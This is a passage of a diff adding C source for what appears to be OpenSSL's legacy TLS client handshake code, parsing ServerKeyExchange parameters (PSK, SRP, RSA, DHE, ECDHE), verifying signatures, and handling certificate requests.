+        CRYPTO_add(&x->references, 1, CRYPTO_LOCK_X509);
+        /*
+         * Why would the following ever happen? We just created sc a couple
+         * of lines ago.
+         */
+        if (sc->peer_pkeys[i].x509 != NULL)
+            X509_free(sc->peer_pkeys[i].x509);
+        sc->peer_pkeys[i].x509 = x;
+        sc->peer_key = &(sc->peer_pkeys[i]);
+
+        if (s->session->peer != NULL)
+            X509_free(s->session->peer);
+        CRYPTO_add(&x->references, 1, CRYPTO_LOCK_X509);
+        s->session->peer = x;
+    } else {
+        sc->peer_cert_type = i;
+        sc->peer_key = NULL;
+
+        if (s->session->peer != NULL)
+            X509_free(s->session->peer);
+        s->session->peer = NULL;
+    }
+    s->session->verify_result = s->verify_result;
+
+    x = NULL;
+    ret = 1;
+    if (0) {
+ f_err:
+        ssl3_send_alert(s, SSL3_AL_FATAL, al);
+    }
+ err:
+    EVP_PKEY_free(pkey);
+    X509_free(x);
+    sk_X509_pop_free(sk, X509_free);
+    return (ret);
+}
+
+int ssl3_get_key_exchange(SSL *s)
+{
+#ifndef OPENSSL_NO_RSA
+    unsigned char *q, md_buf[EVP_MAX_MD_SIZE * 2];
+#endif
+    EVP_MD_CTX md_ctx;
+    unsigned char *param, *p;
+    int al, j, ok;
+    long i, param_len, n, alg_k, alg_a;
+    EVP_PKEY *pkey = NULL;
+    const EVP_MD *md = NULL;
+#ifndef OPENSSL_NO_RSA
+    RSA *rsa = NULL;
+#endif
+#ifndef OPENSSL_NO_DH
+    DH *dh = NULL;
+#endif
+#ifndef OPENSSL_NO_ECDH
+    EC_KEY *ecdh = NULL;
+    BN_CTX *bn_ctx = NULL;
+    EC_POINT *srvr_ecpoint = NULL;
+    int curve_nid = 0;
+    int encoded_pt_len = 0;
+#endif
+
+    EVP_MD_CTX_init(&md_ctx);
+
+    /*
+     * use same message size as in ssl3_get_certificate_request() as
+     * ServerKeyExchange message may be skipped
+     */
+    n = s->method->ssl_get_message(s,
+                                   SSL3_ST_CR_KEY_EXCH_A,
+                                   SSL3_ST_CR_KEY_EXCH_B,
+                                   -1, s->max_cert_list, &ok);
+    if (!ok)
+        return ((int)n);
+
+    alg_k = s->s3->tmp.new_cipher->algorithm_mkey;
+
+    if (s->s3->tmp.message_type != SSL3_MT_SERVER_KEY_EXCHANGE) {
+        /*
+         * Can't skip server key exchange if this is an ephemeral
+         * ciphersuite.
+         */
+        if (alg_k & (SSL_kDHE | SSL_kECDHE)) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_UNEXPECTED_MESSAGE);
+            al = SSL_AD_UNEXPECTED_MESSAGE;
+            goto f_err;
+        }
+#ifndef OPENSSL_NO_PSK
+        /*
+         * In plain PSK ciphersuite, ServerKeyExchange can be omitted if no
+         * identity hint is sent. Set session->sess_cert anyway to avoid
+         * problems later.
+         */
+        if (alg_k & SSL_kPSK) {
+            s->session->sess_cert = ssl_sess_cert_new();
+            if (s->ctx->psk_identity_hint)
+                OPENSSL_free(s->ctx->psk_identity_hint);
+            s->ctx->psk_identity_hint = NULL;
+        }
+#endif
+        s->s3->tmp.reuse_message = 1;
+        return (1);
+    }
+
+    param = p = (unsigned char *)s->init_msg;
+    if (s->session->sess_cert != NULL) {
+#ifndef OPENSSL_NO_RSA
+        if (s->session->sess_cert->peer_rsa_tmp != NULL) {
+            RSA_free(s->session->sess_cert->peer_rsa_tmp);
+            s->session->sess_cert->peer_rsa_tmp = NULL;
+        }
+#endif
+#ifndef OPENSSL_NO_DH
+        if (s->session->sess_cert->peer_dh_tmp) {
+            DH_free(s->session->sess_cert->peer_dh_tmp);
+            s->session->sess_cert->peer_dh_tmp = NULL;
+        }
+#endif
+#ifndef OPENSSL_NO_ECDH
+        if (s->session->sess_cert->peer_ecdh_tmp) {
+            EC_KEY_free(s->session->sess_cert->peer_ecdh_tmp);
+            s->session->sess_cert->peer_ecdh_tmp = NULL;
+        }
+#endif
+    } else {
+        s->session->sess_cert = ssl_sess_cert_new();
+    }
+
+    /* Total length of the parameters including the length prefix */
+    param_len = 0;
+
+    alg_a = s->s3->tmp.new_cipher->algorithm_auth;
+
+    al = SSL_AD_DECODE_ERROR;
+
+#ifndef OPENSSL_NO_PSK
+    if (alg_k & SSL_kPSK) {
+        char tmp_id_hint[PSK_MAX_IDENTITY_LEN + 1];
+
+        param_len = 2;
+        if (param_len > n) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_LENGTH_TOO_SHORT);
+            goto f_err;
+        }
+        n2s(p, i);
+
+        /*
+         * Store PSK identity hint for later use, hint is used in
+         * ssl3_send_client_key_exchange.  Assume that the maximum length of
+         * a PSK identity hint can be as long as the maximum length of a PSK
+         * identity.
+         */
+        if (i > PSK_MAX_IDENTITY_LEN) {
+            al = SSL_AD_HANDSHAKE_FAILURE;
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_DATA_LENGTH_TOO_LONG);
+            goto f_err;
+        }
+        if (i > n - param_len) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
+                   SSL_R_BAD_PSK_IDENTITY_HINT_LENGTH);
+            goto f_err;
+        }
+        param_len += i;
+
+        /*
+         * If received PSK identity hint contains NULL characters, the hint
+         * is truncated from the first NULL. p may not be ending with NULL,
+         * so create a NULL-terminated string.
+         */
+        memcpy(tmp_id_hint, p, i);
+        memset(tmp_id_hint + i, 0, PSK_MAX_IDENTITY_LEN + 1 - i);
+        if (s->ctx->psk_identity_hint != NULL)
+            OPENSSL_free(s->ctx->psk_identity_hint);
+        s->ctx->psk_identity_hint = BUF_strdup(tmp_id_hint);
+        if (s->ctx->psk_identity_hint == NULL) {
+            al = SSL_AD_HANDSHAKE_FAILURE;
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, ERR_R_MALLOC_FAILURE);
+            goto f_err;
+        }
+
+        p += i;
+        n -= param_len;
+    } else
+#endif                          /* !OPENSSL_NO_PSK */
+#ifndef OPENSSL_NO_SRP
+    if (alg_k & SSL_kSRP) {
+        param_len = 2;
+        if (param_len > n) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_LENGTH_TOO_SHORT);
+            goto f_err;
+        }
+        n2s(p, i);
+
+        if (i > n - param_len) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_BAD_SRP_N_LENGTH);
+            goto f_err;
+        }
+        param_len += i;
+
+        if (!(s->srp_ctx.N = BN_bin2bn(p, i, NULL))) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, ERR_R_BN_LIB);
+            goto err;
+        }
+        p += i;
+
+        if (2 > n - param_len) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_LENGTH_TOO_SHORT);
+            goto f_err;
+        }
+        param_len += 2;
+
+        n2s(p, i);
+
+        if (i > n - param_len) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_BAD_SRP_G_LENGTH);
+            goto f_err;
+        }
+        param_len += i;
+
+        if (!(s->srp_ctx.g = BN_bin2bn(p, i, NULL))) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, ERR_R_BN_LIB);
+            goto err;
+        }
+        p += i;
+
+        if (1 > n - param_len) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_LENGTH_TOO_SHORT);
+            goto f_err;
+        }
+        param_len += 1;
+
+        i = (unsigned int)(p[0]);
+        p++;
+
+        if (i > n - param_len) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_BAD_SRP_S_LENGTH);
+            goto f_err;
+        }
+        param_len += i;
+
+        if (!(s->srp_ctx.s = BN_bin2bn(p, i, NULL))) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, ERR_R_BN_LIB);
+            goto err;
+        }
+        p += i;
+
+        if (2 > n - param_len) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_LENGTH_TOO_SHORT);
+            goto f_err;
+        }
+        param_len += 2;
+
+        n2s(p, i);
+
+        if (i > n - param_len) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_BAD_SRP_B_LENGTH);
+            goto f_err;
+        }
+        param_len += i;
+
+        if (!(s->srp_ctx.B = BN_bin2bn(p, i, NULL))) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, ERR_R_BN_LIB);
+            goto err;
+        }
+        p += i;
+        n -= param_len;
+
+        if (!srp_verify_server_param(s, &al)) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_BAD_SRP_PARAMETERS);
+            goto f_err;
+        }
+
+/* We must check if there is a certificate */
+# ifndef OPENSSL_NO_RSA
+        if (alg_a & SSL_aRSA)
+            pkey =
+                X509_get_pubkey(s->session->
+                                sess_cert->peer_pkeys[SSL_PKEY_RSA_ENC].x509);
+# else
+        if (0) ;
+# endif
+# ifndef OPENSSL_NO_DSA
+        else if (alg_a & SSL_aDSS)
+            pkey =
+                X509_get_pubkey(s->session->
+                                sess_cert->peer_pkeys[SSL_PKEY_DSA_SIGN].
+                                x509);
+# endif
+    } else
+#endif                          /* !OPENSSL_NO_SRP */
+#ifndef OPENSSL_NO_RSA
+    if (alg_k & SSL_kRSA) {
+        /* Temporary RSA keys only allowed in export ciphersuites */
+        if (!SSL_C_IS_EXPORT(s->s3->tmp.new_cipher)) {
+            al = SSL_AD_UNEXPECTED_MESSAGE;
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_UNEXPECTED_MESSAGE);
+            goto f_err;
+        }
+        if ((rsa = RSA_new()) == NULL) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+
+        param_len = 2;
+        if (param_len > n) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_LENGTH_TOO_SHORT);
+            goto f_err;
+        }
+        n2s(p, i);
+
+        if (i > n - param_len) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_BAD_RSA_MODULUS_LENGTH);
+            goto f_err;
+        }
+        param_len += i;
+
+        if (!(rsa->n = BN_bin2bn(p, i, rsa->n))) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, ERR_R_BN_LIB);
+            goto err;
+        }
+        p += i;
+
+        if (2 > n - param_len) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_LENGTH_TOO_SHORT);
+            goto f_err;
+        }
+        param_len += 2;
+
+        n2s(p, i);
+
+        if (i > n - param_len) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_BAD_RSA_E_LENGTH);
+            goto f_err;
+        }
+        param_len += i;
+
+        if (!(rsa->e = BN_bin2bn(p, i, rsa->e))) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, ERR_R_BN_LIB);
+            goto err;
+        }
+        p += i;
+        n -= param_len;
+
+        /* this should be because we are using an export cipher */
+        if (alg_a & SSL_aRSA)
+            pkey =
+                X509_get_pubkey(s->session->
+                                sess_cert->peer_pkeys[SSL_PKEY_RSA_ENC].x509);
+        else {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, ERR_R_INTERNAL_ERROR);
+            goto err;
+        }
+        s->session->sess_cert->peer_rsa_tmp = rsa;
+        rsa = NULL;
+    }
+#else                           /* OPENSSL_NO_RSA */
+    if (0) ;
+#endif
+#ifndef OPENSSL_NO_DH
+    else if (alg_k & SSL_kEDH) {
+        if ((dh = DH_new()) == NULL) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, ERR_R_DH_LIB);
+            goto err;
+        }
+
+        param_len = 2;
+        if (param_len > n) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_LENGTH_TOO_SHORT);
+            goto f_err;
+        }
+        n2s(p, i);
+
+        if (i > n - param_len) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_BAD_DH_P_LENGTH);
+            goto f_err;
+        }
+        param_len += i;
+
+        if (!(dh->p = BN_bin2bn(p, i, NULL))) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, ERR_R_BN_LIB);
+            goto err;
+        }
+        p += i;
+
+        if (2 > n - param_len) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_LENGTH_TOO_SHORT);
+            goto f_err;
+        }
+        param_len += 2;
+
+        n2s(p, i);
+
+        if (i > n - param_len) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_BAD_DH_G_LENGTH);
+            goto f_err;
+        }
+        param_len += i;
+
+        if (!(dh->g = BN_bin2bn(p, i, NULL))) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, ERR_R_BN_LIB);
+            goto err;
+        }
+        p += i;
+
+        if (2 > n - param_len) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_LENGTH_TOO_SHORT);
+            goto f_err;
+        }
+        param_len += 2;
+
+        n2s(p, i);
+
+        if (i > n - param_len) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_BAD_DH_PUB_KEY_LENGTH);
+            goto f_err;
+        }
+        param_len += i;
+
+        if (!(dh->pub_key = BN_bin2bn(p, i, NULL))) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, ERR_R_BN_LIB);
+            goto err;
+        }
+        p += i;
+        n -= param_len;
+
+# ifndef OPENSSL_NO_RSA
+        if (alg_a & SSL_aRSA)
+            pkey =
+                X509_get_pubkey(s->session->
+                                sess_cert->peer_pkeys[SSL_PKEY_RSA_ENC].x509);
+# else
+        if (0) ;
+# endif
+# ifndef OPENSSL_NO_DSA
+        else if (alg_a & SSL_aDSS)
+            pkey =
+                X509_get_pubkey(s->session->
+                                sess_cert->peer_pkeys[SSL_PKEY_DSA_SIGN].
+                                x509);
+# endif
+        /* else anonymous DH, so no certificate or pkey. */
+
+        s->session->sess_cert->peer_dh_tmp = dh;
+        dh = NULL;
+    } else if ((alg_k & SSL_kDHr) || (alg_k & SSL_kDHd)) {
+        al = SSL_AD_ILLEGAL_PARAMETER;
+        SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
+               SSL_R_TRIED_TO_USE_UNSUPPORTED_CIPHER);
+        goto f_err;
+    }
+#endif                          /* !OPENSSL_NO_DH */
+
+#ifndef OPENSSL_NO_ECDH
+    else if (alg_k & SSL_kEECDH) {
+        EC_GROUP *ngroup;
+        const EC_GROUP *group;
+
+        if ((ecdh = EC_KEY_new()) == NULL) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+
+        /*
+         * Extract elliptic curve parameters and the server's ephemeral ECDH
+         * public key. Keep accumulating lengths of various components in
+         * param_len and make sure it never exceeds n.
+         */
+
+        /*
+         * XXX: For now we only support named (not generic) curves and the
+         * ECParameters in this case is just three bytes. We also need one
+         * byte for the length of the encoded point
+         */
+        param_len = 4;
+        if (param_len > n) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_LENGTH_TOO_SHORT);
+            goto f_err;
+        }
+        /*
+         * Check curve is one of our preferences, if not server has sent an
+         * invalid curve. ECParameters is 3 bytes.
+         */
+        if (!tls1_check_curve(s, p, 3)) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_WRONG_CURVE);
+            goto f_err;
+        }
+
+        if ((curve_nid = tls1_ec_curve_id2nid(*(p + 2))) == 0) {
+            al = SSL_AD_INTERNAL_ERROR;
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
+                   SSL_R_UNABLE_TO_FIND_ECDH_PARAMETERS);
+            goto f_err;
+        }
+
+        ngroup = EC_GROUP_new_by_curve_name(curve_nid);
+        if (ngroup == NULL) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, ERR_R_EC_LIB);
+            goto err;
+        }
+        if (EC_KEY_set_group(ecdh, ngroup) == 0) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, ERR_R_EC_LIB);
+            goto err;
+        }
+        EC_GROUP_free(ngroup);
+
+        group = EC_KEY_get0_group(ecdh);
+
+        if (SSL_C_IS_EXPORT(s->s3->tmp.new_cipher) &&
+            (EC_GROUP_get_degree(group) > 163)) {
+            al = SSL_AD_EXPORT_RESTRICTION;
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
+                   SSL_R_ECGROUP_TOO_LARGE_FOR_CIPHER);
+            goto f_err;
+        }
+
+        p += 3;
+
+        /* Next, get the encoded ECPoint */
+        if (((srvr_ecpoint = EC_POINT_new(group)) == NULL) ||
+            ((bn_ctx = BN_CTX_new()) == NULL)) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+
+        encoded_pt_len = *p;    /* length of encoded point */
+        p += 1;
+
+        if ((encoded_pt_len > n - param_len) ||
+            (EC_POINT_oct2point(group, srvr_ecpoint,
+                                p, encoded_pt_len, bn_ctx) == 0)) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_BAD_ECPOINT);
+            goto f_err;
+        }
+        param_len += encoded_pt_len;
+
+        n -= param_len;
+        p += encoded_pt_len;
+
+        /*
+         * The ECC/TLS specification does not mention the use of DSA to sign
+         * ECParameters in the server key exchange message. We do support RSA
+         * and ECDSA.
+         */
+        if (0) ;
+# ifndef OPENSSL_NO_RSA
+        else if (alg_a & SSL_aRSA)
+            pkey =
+                X509_get_pubkey(s->session->
+                                sess_cert->peer_pkeys[SSL_PKEY_RSA_ENC].x509);
+# endif
+# ifndef OPENSSL_NO_ECDSA
+        else if (alg_a & SSL_aECDSA)
+            pkey =
+                X509_get_pubkey(s->session->
+                                sess_cert->peer_pkeys[SSL_PKEY_ECC].x509);
+# endif
+        /* else anonymous ECDH, so no certificate or pkey. */
+        EC_KEY_set_public_key(ecdh, srvr_ecpoint);
+        s->session->sess_cert->peer_ecdh_tmp = ecdh;
+        ecdh = NULL;
+        BN_CTX_free(bn_ctx);
+        bn_ctx = NULL;
+        EC_POINT_free(srvr_ecpoint);
+        srvr_ecpoint = NULL;
+    } else if (alg_k) {
+        al = SSL_AD_UNEXPECTED_MESSAGE;
+        SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_UNEXPECTED_MESSAGE);
+        goto f_err;
+    }
+#endif                          /* !OPENSSL_NO_ECDH */
+
+    /* p points to the next byte, there are 'n' bytes left */
+
+    /* if it was signed, check the signature */
+    if (pkey != NULL) {
+        if (SSL_USE_SIGALGS(s)) {
+            int rv;
+            if (2 > n) {
+                SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_LENGTH_TOO_SHORT);
+                goto f_err;
+            }
+            rv = tls12_check_peer_sigalg(&md, s, p, pkey);
+            if (rv == -1)
+                goto err;
+            else if (rv == 0) {
+                goto f_err;
+            }
+#ifdef SSL_DEBUG
+            fprintf(stderr, "USING TLSv1.2 HASH %s\n", EVP_MD_name(md));
+#endif
+            p += 2;
+            n -= 2;
+        } else
+            md = EVP_sha1();
+
+        if (2 > n) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_LENGTH_TOO_SHORT);
+            goto f_err;
+        }
+        n2s(p, i);
+        n -= 2;
+        j = EVP_PKEY_size(pkey);
+
+        /*
+         * Check signature length. If n is 0 then signature is empty
+         */
+        if ((i != n) || (n > j) || (n <= 0)) {
+            /* wrong packet length */
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_WRONG_SIGNATURE_LENGTH);
+            goto f_err;
+        }
+#ifndef OPENSSL_NO_RSA
+        if (pkey->type == EVP_PKEY_RSA && !SSL_USE_SIGALGS(s)) {
+            int num;
+            unsigned int size;
+
+            j = 0;
+            q = md_buf;
+            for (num = 2; num > 0; num--) {
+                EVP_MD_CTX_set_flags(&md_ctx, EVP_MD_CTX_FLAG_NON_FIPS_ALLOW);
+                EVP_DigestInit_ex(&md_ctx, (num == 2)
+                                  ? s->ctx->md5 : s->ctx->sha1, NULL);
+                EVP_DigestUpdate(&md_ctx, &(s->s3->client_random[0]),
+                                 SSL3_RANDOM_SIZE);
+                EVP_DigestUpdate(&md_ctx, &(s->s3->server_random[0]),
+                                 SSL3_RANDOM_SIZE);
+                EVP_DigestUpdate(&md_ctx, param, param_len);
+                EVP_DigestFinal_ex(&md_ctx, q, &size);
+                q += size;
+                j += size;
+            }
+            i = RSA_verify(NID_md5_sha1, md_buf, j, p, n, pkey->pkey.rsa);
+            if (i < 0) {
+                al = SSL_AD_DECRYPT_ERROR;
+                SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_BAD_RSA_DECRYPT);
+                goto f_err;
+            }
+            if (i == 0) {
+                /* bad signature */
+                al = SSL_AD_DECRYPT_ERROR;
+                SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_BAD_SIGNATURE);
+                goto f_err;
+            }
+        } else
+#endif
+        {
+            EVP_VerifyInit_ex(&md_ctx, md, NULL);
+            EVP_VerifyUpdate(&md_ctx, &(s->s3->client_random[0]),
+                             SSL3_RANDOM_SIZE);
+            EVP_VerifyUpdate(&md_ctx, &(s->s3->server_random[0]),
+                             SSL3_RANDOM_SIZE);
+            EVP_VerifyUpdate(&md_ctx, param, param_len);
+            if (EVP_VerifyFinal(&md_ctx, p, (int)n, pkey) <= 0) {
+                /* bad signature */
+                al = SSL_AD_DECRYPT_ERROR;
+                SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_BAD_SIGNATURE);
+                goto f_err;
+            }
+        }
+    } else {
+        /* aNULL, aSRP or kPSK do not need public keys */
+        if (!(alg_a & (SSL_aNULL | SSL_aSRP)) && !(alg_k & SSL_kPSK)) {
+            /* Might be wrong key type, check it */
+            if (ssl3_check_cert_and_algorithm(s))
+                /* Otherwise this shouldn't happen */
+                SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, ERR_R_INTERNAL_ERROR);
+            goto err;
+        }
+        /* still data left over */
+        if (n != 0) {
+            SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_EXTRA_DATA_IN_MESSAGE);
+            goto f_err;
+        }
+    }
+    EVP_PKEY_free(pkey);
+    EVP_MD_CTX_cleanup(&md_ctx);
+    return (1);
+ f_err:
+    ssl3_send_alert(s, SSL3_AL_FATAL, al);
+ err:
+    EVP_PKEY_free(pkey);
+#ifndef OPENSSL_NO_RSA
+    if (rsa != NULL)
+        RSA_free(rsa);
+#endif
+#ifndef OPENSSL_NO_DH
+    if (dh != NULL)
+        DH_free(dh);
+#endif
+#ifndef OPENSSL_NO_ECDH
+    BN_CTX_free(bn_ctx);
+    EC_POINT_free(srvr_ecpoint);
+    if (ecdh != NULL)
+        EC_KEY_free(ecdh);
+#endif
+    EVP_MD_CTX_cleanup(&md_ctx);
+    return (-1);
+}
+
+int ssl3_get_certificate_request(SSL *s)
+{
+    int ok, ret = 0;
+    unsigned long n, nc, l;
+    unsigned int llen, ctype_num, i;
+    X509_NAME *xn = NULL;
+    const unsigned char *p, *q;
+    unsigned char *d;
+    STACK_OF(X509_NAME) *ca_sk = NULL;
+
+    n = s->method->ssl_get_message(s,
+                                   SSL3_ST_CR_CERT_REQ_A,
+                                   SSL3_ST_CR_CERT_REQ_B,
+                                   -1, s->max_cert_list, &ok);
+
+    if (!ok)
+        return ((int)n);
+
+    s->s3->tmp.cert_req = 0;
+
+    if (s->s3->tmp.message_type == SSL3_MT_SERVER_DONE) {
+        s->s3->tmp.reuse_message = 1;
+        /*
+         * If we get here we don't need any cached handshake records as we
+         * wont be doing client auth.
+         */
+        if (s->s3->handshake_buffer) {
+            if (!ssl3_digest_cached_records(s))
+                goto err;
+        }
+        return (1);
+    }
+
+    if (s->s3->tmp.message_type != SSL3_MT_CERTIFICATE_REQUEST) {
+        ssl3_send_alert(s, SSL3_AL_FATAL, SSL_AD_UNEXPECTED_MESSAGE);
+        SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST, SSL_R_WRONG_MESSAGE_TYPE);
+        goto err;
+    }
+
+    /* TLS does not like anon-DH with client cert */
+    if (s->version > SSL3_VERSION) {
+        if (s->s3->tmp.new_cipher->algorithm_auth & SSL_aNULL) {
+            ssl3_send_alert(s, SSL3_AL_FATAL, SSL_AD_UNEXPECTED_MESSAGE);
+            SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST,
+                   SSL_R_TLS_CLIENT_CERT_REQ_WITH_ANON_CIPHER);
+            goto err;
+        }
+    }
+
+    p = d = (unsigned char *)s->init_msg;
+
+    if ((ca_sk = sk_X509_NAME_new(ca_dn_cmp)) == NULL) {
+        SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    /* get the certificate types */
+    ctype_num = *(p++);
+    if (s->cert->ctypes) {
+        OPENSSL_free(s->cert->ctypes);
+        s->cert->ctypes = NULL;
+    }
+    if (ctype_num > SSL3_CT_NUMBER) {
+        /* If we exceed static buffer copy all to cert structure */
+        s->cert->ctypes = OPENSSL_malloc(ctype_num);
+        memcpy(s->cert->ctypes, p, ctype_num);
+        s->cert->ctype_num = (size_t)ctype_num;
+        ctype_num = SSL3_CT_NUMBER;
+    }
+    for (i = 0; i < ctype_num; i++)
+        s->s3->tmp.ctype[i] = p[i];
+    p += p[-1];
+    if (SSL_USE_SIGALGS(s)) {
+        n2s(p, llen);
+        /*
+         * Check we have enough room for signature algorithms and following
+         * length value.
+         */
+        if ((unsigned long)(p - d + llen + 2) > n) {
+            ssl3_send_alert(s, SSL3_AL_FATAL, SSL_AD_DECODE_ERROR);
+            SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST,
+                   SSL_R_DATA_LENGTH_TOO_LONG);
+            goto err;
+        }
+        /* Clear certificate digests and validity flags */
+        for (i = 0; i < SSL_PKEY_NUM; i++) {
+            s->cert->pkeys[i].digest = NULL;
+            s->cert->pkeys[i].valid_flags = 0;
+        }
+        if ((llen & 1) || !tls1_save_sigalgs(s, p, llen)) {
+            ssl3_send_alert(s, SSL3_AL_FATAL, SSL_AD_DECODE_ERROR);
+            SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST,
+                   SSL_R_SIGNATURE_ALGORITHMS_ERROR);
+            goto err;
+        }
+        if (!tls1_process_sigalgs(s)) {
+            ssl3_send_alert(s, SSL3_AL_FATAL, SSL_AD_INTERNAL_ERROR);
+            SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        p += llen;
+    }
+
+    /* get the CA RDNs */
+    n2s(p, llen);
+#if 0
+    {
+        FILE *out;
+        out = fopen("/tmp/vsign.der", "w");
+        fwrite(p, 1, llen, out);
+        fclose(out);
+    }
+#endif
+
+    if ((unsigned long)(p - d + llen) != n) {
+        ssl3_send_alert(s, SSL3_AL_FATAL, SSL_AD_DECODE_ERROR);
+        SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST, SSL_R_LENGTH_MISMATCH);
+        goto err;
+    }
+
+    for (nc = 0; nc < llen;) {
+        n2s(p, l);
+        if ((l + nc + 2) > llen) {
+            if ((s->options & SSL_OP_NETSCAPE_CA_DN_BUG))
+                goto cont;      /* netscape bugs */
+            ssl3_send_alert(s, SSL3_AL_FATAL, SSL_AD_DECODE_ERROR);
+            SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST, SSL_R_CA_DN_TOO_LONG);
+            goto err;
+        }
+
+        q = p;
+
+        if ((xn = d2i_X509_NAME(NULL, &q, l)) == NULL) {
+            /* If netscape tolerance is on, ignore errors */
+            if (s->options & SSL_OP_NETSCAPE_CA_DN_BUG)
+                goto cont;
+            else {
+                ssl3_send_alert(s, SSL3_AL_FATAL, SSL_AD_DECODE_ERROR);
+                SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST, ERR_R_ASN1_LIB);
+                goto err;
+            }
+        }
+
+        if (q != (p + l)) {
+            ssl3_send_alert(s, SSL3_AL_FATAL, SSL_AD_DECODE_ERROR);
+            SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST,
+                   SSL_R_CA_DN_LENGTH_MISMATCH);
+            goto err;
+        }
+        if (!sk_X509_NAME_push(ca_sk, xn)) {
+            SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+
+        p += l;
+        nc += l + 2;
+    }
+
+    if (0) {
+ cont:
+        ERR_clear_error();
+    }
+
+    /* we should setup a certificate to return.... */
+    s->s3->tmp.cert_req = 1;
+    s->s3->tmp.ctype_num = ctype_num;
+    if (s->s3->tmp.ca_names != NULL)
+        sk_X509_NAME_pop_free(s->s3->tmp.ca_names, X509_NAME_free);
+    s->s3->tmp.ca_names = ca_sk;
+    ca_sk = NULL;
+
+    ret = 1;
+ err:
+    if (ca_sk != NULL)
+        sk_X509_NAME_pop_free(ca_sk, X509_NAME_free);
+    return (ret);
+}
+
+static int ca_dn_cmp(const X509_NAME *const *a, const X509_NAME *const *b)
+{
+    return (X509_NAME_cmp(*a, *b));
+}
+
+#ifndef OPENSSL_NO_TLSEXT
+int ssl3_get_new_session_ticket(SSL *s)
+{
+    int ok, al, ret = 0, ticklen;
+    long n;
+    const unsigned char *p;
+    unsigned char *d;
+
